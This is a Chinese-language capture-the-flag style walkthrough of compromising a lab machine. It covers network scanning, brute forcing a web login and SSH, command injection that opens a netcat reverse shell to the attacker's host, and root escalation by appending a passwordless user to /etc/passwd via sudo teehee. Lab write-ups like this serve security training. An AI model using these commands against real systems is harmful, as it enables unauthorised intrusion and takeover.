一、信息收集

1、查看靶机MAC地址：

2、查看靶机的ip地址：

nmap 192.168.13.0/24

3、查看靶机开放的端口：

nmap -p- -sC -sT -sV -A 192.168.13.161

4、访问靶机的80端口：

5、扫描目录：

dirsearch -u "http://192.168.13.161"

6、拼接访问之后发现没有对登录框有用的信息，返回登录框进行测试，发现不存在sql注入，使用弱口令进行尝试，发现账号是admin，密码没有试出来，使用burp进行爆破：

账号密码：admin:happy

成功登录

7、登录 之后，发现有回显，bp抓包进行查看可以执行相关命令：

8、使用bp进行抓包，修改命令为反弹shell的语句：

nc+-e+/bin/bash+192.168.13.128+5555

9、kali开启监听：

10、查看是否反弹到，成功反弹但是用户权限不高：

11、使用命令获得交互式shell:

python -c 'import pty; pty.spawn("/bin/bash")'

二、提权

1、查看用户是否有sudo权限，发现需要输入密码，我们没有密码看不了：

2、查看一下有什么用户可以登录：

root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

3、有四个用户，分别查看一下目录，发现在jim目录里面有一个.bak文件：

ls /home/jim
ls /home/sam
ls /home/charles

4、查看这个文件，发现是一个密码文件，将它复制到本地：

5、尝试进行ssh爆破用户jim的密码：

hydra -l jim -P /home/kali/passwd.txt ssh://192.168.13.161

得到 jim 账户的密码为 jibril04

6、使用账号密码进行ssh连接：

7、查看这个账户的sudo权限，也没有sudo -l权限：

8、查看 mbox 的内容：

9、查看是一份邮件，由root用户发送给jim的一个邮件，则切换邮件存储路径即 /var/mail 路径下，可以看到存在 www-data 和 jim 两个文件：

10、先查看 jim 文件的内容，www-data只有www-data用户可以访问：

11、发现了账号和密码，切换一下：

账号和密码：charles：^xHhA&hvim0y

12、发现这个用户有sudo权限：

13、创建一个用户，使用teehee追加到/etc/passwd 中：

echo "IAMROOT::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su IAMROOT

14、查看flag.txt: